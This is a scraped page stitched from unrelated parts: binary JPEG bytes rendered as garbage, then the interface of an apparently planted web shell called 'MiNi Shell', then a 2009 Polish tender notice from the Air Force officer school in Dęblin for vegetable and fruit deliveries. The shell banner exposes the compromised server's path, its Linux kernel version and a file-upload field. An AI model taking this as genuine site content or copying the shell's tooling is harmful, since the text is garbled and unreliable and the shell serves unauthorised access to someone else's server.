JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090423/66031-N-2009.html

<p class="kh_header"><b>Dęblin: Dostawa warzyw i owoców</b><br>
<b>Numer ogłoszenia: 66031 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wyższa Szkoła Oficerska Sił Powietrznych w Dęblinie , ul. Dywizjonu 303 12, 08-521 Dęblin, woj. lubelskie, tel. 081 551 71 00, faks 081 551 71 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wsosp.deblin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i owoców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa warzyw i owoców zgodnych z normami jakościowymi i pozostałymi wymaganiami  określonymi w szczegółowym opisie przedmiotu zamówienia - Formularzu cenowym, w następującym asortymencie i ilościach:
Zadanie I  Warzywa, grzyby, groch, fasola, owoce:
Warzywa
1) 2.500 kg buraków ćwikłowych świeżych kl. I  (CPV 03221111-7),
2) 1.000 kg marchwi  młodej  kl. I  (CPV 03221112-4),
3) 3.200 kg marchwi  świeżej  kl. I (CPV 03221112-4),
4) 2.000 kg cebuli świeżej kl. I (CPV 03221113-1),
5) 300 kg fasolki szparagowej świeżej kl. I (CPV 03221212-5)
6) 800 kg papryki świeżej kl. I kolorowej (CPV 03221230-7),
7) 2.800 kg pomidorów świeżych kl. I (CPV 03221240-0),
8) 1.500 kg ogórków świeżych kl. I (CPV 03221270-9),
9) 1000 kg sałaty głowiastej kl. I  (CPV 03221310-2),
10) 100 kg sałaty karbowanej  kl. I  (CPV 03221310-2),
11) 1.800 kg kapusty białej świeżej kl. I (CPV 03221410-3),
12) 750 kg kapusty białej młodej kl. I (CPV 03221410-3),
13) 1.200 kg kapusty czerwonej świeżej kl. I (CPV 03221410-3),
14) 500 kg kapusty włoskiej świeżej kl. I (CPV 03221410-3),
15) 750 kg kapusty pekińskiej świeżej kl. I (CPV 03221410-3),
16) 300 kg kapusty brukselki świeżej kl. I (CPV 03221440-2),
17) 1.100 kg kalafiora świeżego kl. I  (CPV 03221420-6),
18) 500 kg brokułu świeżego kl. I (CPV 03221430-9)
19) 350 kg rzodkiewki świeżej kl. I (CPV 03221100-7),
20) 120 kg rzodkwi białej świeżej kl. I (CPV 03221100-7),
21) 600 kg pietruszki korzeniowej świeżej kl. I (CPV 03221110-0),
22) 900 kg selera korzeniowego świeżego kl. I (CPV 03221120-3),
23) 900 kg pora świeżego kl. I (CPV 03221000-6),
24) 45 kg natki pietruszki  świeżej (CPV 03221000-6),
25) 30 kg koperku zielonego świeżego (CPV 03221000-6),
26) 400 kg szczypiorku  świeżego (CPV 03221000-6),
27) 18 kg czosnku (CPV 03221120-3),
28) 150 kg botwiny świeżej (CPV 03221111-7),
29) 11.000 kg ziemniaków jadalnych późnych (CPV 03212100-1),
30) 3.000 kg ziemniaków jadalnych młodych (CPV 03212100-1),
31) 1.000 kg fasoli białej  (CPV 15331130-7),
32) 800 kg grochu obłuskiwanego polerowanego połówki  (CPV 15331133-8),
Grzyby jadalne
33) 800 kg pieczarek  kl. I  (CPV 03221260-6),
Owoce
34) 100 kg porzeczki czerwonej świeżej kl. I  (CPV 03222311-6),
35) 100 kg porzeczki czarnej świeżej kl. I (CPV 03222311-6),
36) 500 kg truskawek świeżych kl. I (CPV 03222313-0),
37) 500 kg wiśni świeżych kl. I (CPV 03222333-6),
38) 500 kg śliwek świeżych kl. I (CPV 03222334-3),
39) 80 kg czereśni świeżych kl.  I (CPV 03222330-5),
40) 3.000 kg jabłek świeżych kl. I odmian: JONAGOLD, JONIKA, CAPION, LOBO, LIGOL, RUBION (CPV 032222321-9).
Zadanie II Owoce
Owoce tropikalne
a) 2.600 kg bananów kl. I (CPV 03222111-4),
b) 800 kg owoców kiwi kl. I (CPV 03222118-3),
c) 350 kg cytryn kl. I (CPV 03222210-8),
d) 1.000 kg pomarańczy (CPV 03222220-1),
e) 1.500 kg mandarynek (CPV 03222240-7).
Owoce inne niż tropikalne
f) 500 kg gruszek świeżych kl. I (CPV 03222322-6),
g) 1.000 kg brzoskwiń świeżych kl. I(CPV 03222332-9), 
h) 600 kg nektarynek świeżych kl. I (CPV 03222330-5),
i) 500 kg winogron deserowych jasnych świeżych kl. I (CPV 03222341-5),
j) 500 kg winogron deserowych różowych świeżych kl. I (CPV 03222341-5),
k) 500 kg winogron deserowych ciemnych świeżych kl. I (CPV 03222341-5),
l) 500 kg arbuza (CPV 03222000-3),.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.20.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium: 
1) Zamawiający żąda od Wykonawców wniesienia wadium;
2) przystępując do przetargu Wykonawca jest obowiązany wnieść wadium w wysokości:
   a) składając ofertę na Część I 1.700,00 zł słownie: jeden tysiąc siedemset złotych,
   b) składając ofertę na Część II 1.005,00 zł słownie: jeden tysiąc pięć złotych;
3) jeżeli Wykonawca składa ofertę na więcej niż jedną część, wadium należy wnieść w wysokości sumy wadiów za poszczególne części.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:
1) posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli odrębne przepisy nakładają obowiązek posiadania takich uprawnień;
2) posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) niepodleganie wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy.
Zamawiający uzna, że Wykonawca spełnia warunki udziału w postepowaniu, jeżeli Wykonawca złoży oświadczenia i dokumenty wymienione w Dziale I pkt 7 specyfikacji istotnych warunków zamówienia.
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Zamawiający oceni, czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego.
Niespełnienie choćby jednego warunku skutkować będzie wykluczeniem Wykonawcy.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia albo nie spełnia poszczególnego warunku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy muszą dołączyć następujące oświadczenia i dokumenty:
1) oferta wypełniona na Formularzu oferty zawartym w Dziale II niniejszej specyfikacji;
2) oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 22 ust. 1 pkt. 1 - 4 ustawy - zał. Nr 1 do oferty;
3) oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - zał. Nr 2 do oferty;
4) oświadczenie o poddaniu się procedurom kontrolnym w trakcie realizacji dostaw przez Służby Dyżurne Zamawiającego - zał. Nr 3 do oferty;
5) wykaz czynności, których wykonanie Wykonawca powierzy podwykonawcom - zał. nr 4 do oferty - ( załącznik nie jest wymagany w przypadku wykonywania przez Wykonawcę całości zamówienia bez udziału podwykonawców; 
6) oświadczenie, w przypadku Wykonawcy będącego rolnikiem ryczałtowym, że jest rolnikiem ryczałtowym zwolnionym od podatku od towarów i usług na podstawie art. 43 ust. 1 pkt 3 ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z dnia 5 kwietnia 2004 r. Nr 54, poz. 535 z późn. zm.) - zał. Nr 5 do oferty;
7) wykaz zrealizowanych dostaw przez Wykonawcę -  co najmniej jednej (1) dostawy (umowy) na kwotę min. 60.000,00 zł brutto dla zadania I, 30.000,00 zł brutto dla zadania II tożsamych z dostawami stanowiącymi przedmiot zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania a jeżeli okres działalności jest krótszy - w tym okresie, wraz z dokumentami potwierdzającymi, że wymienione dostawy zostały należycie wykonane - zał. Nr 6 do oferty;
8) wypełniony formularz cenowy (szczegółowy opis przedmiotu zamówienia) - zał. Nr 7 do oferty;
9) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, z datą wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Rolnicy indywidualni przedstawiają odpowiednio aktualne zaświadczenie o posiadaniu bądź dzierżawie gospodarstwa rolnego, wydanego przez Urząd Miasta, Gminy lub wójta gminy wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
10) pełnomocnictwo, w przypadku składania oferty przez pełnomocnika;
11) decyzje właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzenia, warunkowego zatwierdzenia, przedłużenia warunkowego zatwierdzenia zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia niezwierzęcego zgodnie z ustawą z dnia 25 sierpnia 2006 r. 
o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171, poz. 1225) -  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień lub zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. 
Nr 106, poz. 730) (nie dotyczy rolników, w rozumieniu przepisów ustawy o ubezpieczeniu społecznym rolników, w zakresie prowadzonej działalności rolniczej);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> wsosp.deblin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wyższa Szkoła Oficerska Sił Powietrznych w Dęblinie
ul. 2 Pułku Kraków 20, pok. nr 13,
tel. (0-81) 551-74-53
od poniedziałku do piątku w godzinach od godz. 7.30 do godz. 15.30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 08:00, miejsce: Oferty należy złożyć do dnia 5 maja 2009 r. godz. 08.00 w kancelarii jawnej Wyższej Szkoły Oficerskiej Sił Powietrznych w Dęblinie, ul. Szkoły Podchorążych Lotnictwa nr 4,  kancelaria jawna-pok.nr 203.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com